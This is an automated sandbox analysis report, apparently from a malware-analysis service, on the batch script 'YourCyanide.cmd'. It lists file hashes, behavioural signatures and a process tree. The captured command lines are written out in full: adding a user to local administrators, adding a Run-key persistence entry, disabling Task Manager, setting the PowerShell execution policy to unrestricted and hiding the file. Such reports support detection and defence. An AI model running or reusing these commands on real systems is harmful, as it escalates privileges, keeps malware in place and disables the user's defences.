Resubmissions
15-11-2024 12:51 | 241115-p3ywnsthmh | score 9
18-05-2022 00:35 | 220518-axmh5abbc9 | score 10
18-05-2022 00:32 | 220518-avncmsbbb7 | score 10

Analysis
max time kernel: 35s
max time network: 101s
platform: windows11-21h2_x64
resource: win11-20241023-en
resource tags: arch:x64, arch:x86, image:win11-20241023-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 15-11-2024 12:51

Static task: static1
Behavioral task: behavioral1
Sample: YourCyanide.cmd
Resource: win11-20241023-en
Errors:

General
Target: YourCyanide.cmd
Size: 90KB
MD5: 4cb725f17bec289507f9e8249c8ea80e
SHA1: a7034e84cb884bf90e61ce3b621424bec57334ae
SHA256: 1f3e3ed8e708fc98bddddca71de7b9e21c6d2a4b2bf019c260e0b707140f9f62
SHA512: 776982eab99b1285c209b71e2fd39e2765e9ce392a6c310208e72157dab3895b0b5a7c8b63d72e69bc507c88faec90a2f8f57788873f1a617a2659e22d2b7288
SSDEEP: 1536:myOIprQ75GiWVIHp/gyaNFCygr8dcW7HO2mVd75lQCgyUqG8cA4eD1yXHn/Wjvur:myOIp1
Malware Config
Signatures

Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.

Blocklisted process makes network request (1 IoCs)
  flow | pid  | Process
  2    | 1748 | powershell.exe

Command and Scripting Interpreter: PowerShell
  pid  | Process
  2476 | powershell.exe
  3620 | powershell.exe
  3652 | powershell.exe
  2000 | powershell.exe
  4056 | powershell.exe
  4760 | powershell.exe
  4336 | powershell.exe
  1748 | powershell.exe

Disables Task Manager via registry modification
Modifies Windows Firewall (2 TTPs, 64 IoCs)
  Process: netsh.exe for all 64 entries
  pids, in the order listed: 1640, 1632, 3944, 4988, 1168, 2280, 2956, 1420, 1488, 916, 4196, 3676, 4264, 2796, 4476, 4176, 4200, 2584, 916, 1664, 2844, 1384, 2332, 4348, 4024, 1668, 4404, 1732, 3156, 3788, 1588, 1108, 3588, 3588, 1168, 4156, 3436, 2632, 4024, 2700, 2024, 2188, 3532, 3196, 3640, 4400, 4884, 1732, 3312, 3944, 1876, 2368, 3456, 260, 1068, 3688, 2720, 4756, 260, 4440, 4276, 4848, 2796, 3456
Adds Run key to start application (2 TTPs, 1 IoCs)
  description     | ioc                                                                                                                                           | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_17507_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.cmd" | reg.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow | ioc
  1    | pastebin.com
  2    | pastebin.com

Drops file in Windows directory (2 IoCs)
  description                  | ioc                   | Process
  File opened for modification | C:\Windows\win.ini    | cmd.exe
  File opened for modification | C:\Windows\system.ini | cmd.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL (1 TTPs, 64 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  ioc: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh and Process: netsh.exe for all 64 entries
  description, in the order listed: Key queried, Key opened, Key opened, Key opened, Key queried, Key queried, Key opened, Key opened, Key opened, Key value enumerated, Key opened, Key value enumerated, Key opened, Key value enumerated, Key opened, Key opened, Key queried, Key queried, Key opened, Key opened, Key queried, Key opened, Key value enumerated, Key value enumerated, Key value enumerated, Key opened, Key queried, Key value enumerated, Key value enumerated, Key queried, Key queried, Key queried, Key value enumerated, Key opened, Key queried, Key value enumerated, Key opened, Key value enumerated, Key queried, Key queried, Key opened, Key queried, Key opened, Key value enumerated, Key queried, Key opened, Key value enumerated, Key value enumerated, Key value enumerated, Key value enumerated, Key queried, Key value enumerated, Key value enumerated, Key value enumerated, Key value enumerated, Key value enumerated, Key value enumerated, Key queried, Key value enumerated, Key opened, Key queried, Key opened, Key value enumerated, Key opened
Permission Groups Discovery: Local Groups (1 TTPs)
  Attempt to find local system groups and permission settings.

System Time Discovery (1 TTPs, 6 IoCs)
  Adversary may gather the system time and/or time zone settings from a local or remote system.
  pid  | Process
  4092 | net1.exe
  840  | net.exe
  1488 | net1.exe
  3116 | net.exe
  1176 | net1.exe
  3216 | net.exe

Kills process with taskkill (1 IoCs)
  pid  | Process
  4848 | taskkill.exe
Modifies registry class (46 IoCs)
  description | ioc | Process
  Set value (int) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | powershell.exe
  Key created | \Registry\User\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\NotificationData | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | powershell.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | powershell.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings | cmd.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | powershell.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | powershell.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | powershell.exe
  Set value (data) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | powershell.exe
  Key created | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | powershell.exe
NTFS ADS (3 IoCs)
  description                  | ioc                                           | Process
  File opened for modification | C:\Users\Admin\AppData\Local\Temp\%YTsAV:~24  | cmd.exe
  File opened for modification | C:\Users\Admin\%ONRsX:~13                     | cmd.exe
  File opened for modification | C:\Users\Admin\%onRsx:~13                     | cmd.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (54 IoCs)
  pid/Process pairs, in the order listed: 2476 powershell.exe, 2476 powershell.exe, 2476 powershell.exe, 4424 tskill.exe, 4424 tskill.exe, 3676 tskill.exe, 3676 tskill.exe, 2156 tskill.exe, 2156 tskill.exe, 4132 tskill.exe, 4132 tskill.exe, 2332 tskill.exe, 2332 tskill.exe, 1932 tskill.exe, 1932 tskill.exe, 1516 tskill.exe, 1516 tskill.exe, 1224 tskill.exe, 1224 tskill.exe, 1160 tskill.exe, 1160 tskill.exe, 3764 tskill.exe, 3764 tskill.exe, 1996 tskill.exe, 1996 tskill.exe, 4936 tskill.exe, 4936 tskill.exe, 4904 tskill.exe, 4904 tskill.exe, 1748 powershell.exe, 1748 powershell.exe, 1748 powershell.exe, 3620 powershell.exe, 3620 powershell.exe, 3652 powershell.exe, 3652 powershell.exe, 2000 powershell.exe, 2000 powershell.exe, 3620 powershell.exe, 4056 powershell.exe, 4056 powershell.exe, 4056 powershell.exe, 2000 powershell.exe, 3652 powershell.exe, 3620 powershell.exe, 4056 powershell.exe, 2000 powershell.exe, 3652 powershell.exe, 4760 powershell.exe, 4760 powershell.exe, 4760 powershell.exe, 4336 powershell.exe, 4336 powershell.exe, 4336 powershell.exe

Suspicious use of AdjustPrivilegeToken (9 IoCs)
  description             | pid  | Process
  Token: SeDebugPrivilege | 2476 | powershell.exe
  Token: SeDebugPrivilege | 4848 | taskkill.exe
  Token: SeDebugPrivilege | 1748 | powershell.exe
  Token: SeDebugPrivilege | 3620 | powershell.exe
  Token: SeDebugPrivilege | 3652 | powershell.exe
  Token: SeDebugPrivilege | 2000 | powershell.exe
  Token: SeDebugPrivilege | 4056 | powershell.exe
  Token: SeDebugPrivilege | 4760 | powershell.exe
  Token: SeDebugPrivilege | 4336 | powershell.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
  pid  | Process
  4760 | powershell.exe
  4336 | powershell.exe
Suspicious use of WriteProcessMemory (64 IoCs)
  Each row below appears twice in the report (64 entries, 32 distinct).
  description                      | pid  | Process | procid_target
  PID 4896 wrote to memory of 1420 | 4896 | cmd.exe | 80
  PID 4896 wrote to memory of 5088 | 4896 | cmd.exe | 81
  PID 4896 wrote to memory of 2288 | 4896 | cmd.exe | 82
  PID 4896 wrote to memory of 3680 | 4896 | cmd.exe | 84
  PID 4896 wrote to memory of 1644 | 4896 | cmd.exe | 86
  PID 4896 wrote to memory of 2972 | 4896 | cmd.exe | 88
  PID 4896 wrote to memory of 4224 | 4896 | cmd.exe | 90
  PID 4896 wrote to memory of 2476 | 4896 | cmd.exe | 92
  PID 4896 wrote to memory of 4672 | 4896 | cmd.exe | 93
  PID 4672 wrote to memory of 756  | 4672 | net.exe | 95
  PID 4896 wrote to memory of 3852 | 4896 | cmd.exe | 96
  PID 4896 wrote to memory of 4432 | 4896 | cmd.exe | 97
  PID 4896 wrote to memory of 2472 | 4896 | cmd.exe | 98
  PID 4896 wrote to memory of 2124 | 4896 | cmd.exe | 99
  PID 4896 wrote to memory of 3180 | 4896 | cmd.exe | 102
  PID 3180 wrote to memory of 4900 | 3180 | net.exe | 103
  PID 2472 wrote to memory of 1996 | 2472 | cmd.exe | 104
  PID 4896 wrote to memory of 4848 | 4896 | cmd.exe | 105
  PID 2124 wrote to memory of 2572 | 2124 | cmd.exe | 106
  PID 2472 wrote to memory of 1576 | 2472 | cmd.exe | 108
  PID 2124 wrote to memory of 3980 | 2124 | cmd.exe | 109
  PID 4896 wrote to memory of 1816 | 4896 | cmd.exe | 110
  PID 2472 wrote to memory of 1072 | 2472 | cmd.exe | 111
  PID 1816 wrote to memory of 2832 | 1816 | net.exe | 184
  PID 4896 wrote to memory of 3624 | 4896 | cmd.exe | 113
  PID 2124 wrote to memory of 3996 | 2124 | cmd.exe | 114
  PID 3624 wrote to memory of 4980 | 3624 | net.exe | 187
  PID 2472 wrote to memory of 2672 | 2472 | cmd.exe | 192
  PID 4896 wrote to memory of 444  | 4896 | cmd.exe | 117
  PID 444 wrote to memory of 1868  | 444  | net.exe | 190
  PID 2124 wrote to memory of 2828 | 2124 | cmd.exe | 193
  PID 4896 wrote to memory of 4056 | 4896 | cmd.exe | 225

Views/modifies file attributes (1 TTPs, 1 IoCs)
  pid  | Process
  1420 | attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd"1⤵
- Drops file in Windows directory
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd2⤵
- Views/modifies file attributes
PID:1420
-
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵PID:5088
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2288
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3680
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1644
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2972
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:4224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD3⤵PID:756
-
-
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_17507_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd /f2⤵
- Adds Run key to start application
PID:3852
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f2⤵PID:4432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1996
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1576
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1072
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2672
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4256
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1920
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3184
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2188
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1888
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4576
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2256
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4324
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5024
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4476
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:892
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2152
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2844
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4760
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3788
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2540
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2468
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3180
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4464
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3220
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2828
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2172
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2368
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1472
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1488
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:896
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:564
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4652
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4336
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:112
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5080
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2468
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3152
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3808
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4980
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3688
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3184
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2344
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3476
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3088
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1132
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4156
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2056
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3312
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1544
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3204
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4764
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3392
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4336
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1460
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:112
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2416
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2464
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4432
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2632
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5036
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1576
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3180
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2140
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3028
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3116
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1616
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3220
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1868
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4256
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2828
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3196
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2896
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3172
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4736
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2280
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3936
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1724
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1964
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3148
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2732
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2960
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1132
-
-
    C:\Windows\system32\scrnsave.scr  |  C:\Windows\system32\scrnsave.scr /s  |  level 3  |  28 instances, PIDs in order: 4932, 1668, 3428, 3768, 1420, 2564, 2332, 1352, 4432, 428, 3024, 1916, 4140, 3084, 2340, 4352, 3404, 3124, 2700, 3768, 2980, 1388, 4548, 2572, 4464, 3612, 3996, 1196
C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /K black.bat  |  level 2  |  PID 2124  |  Suspicious use of WriteProcessMemory
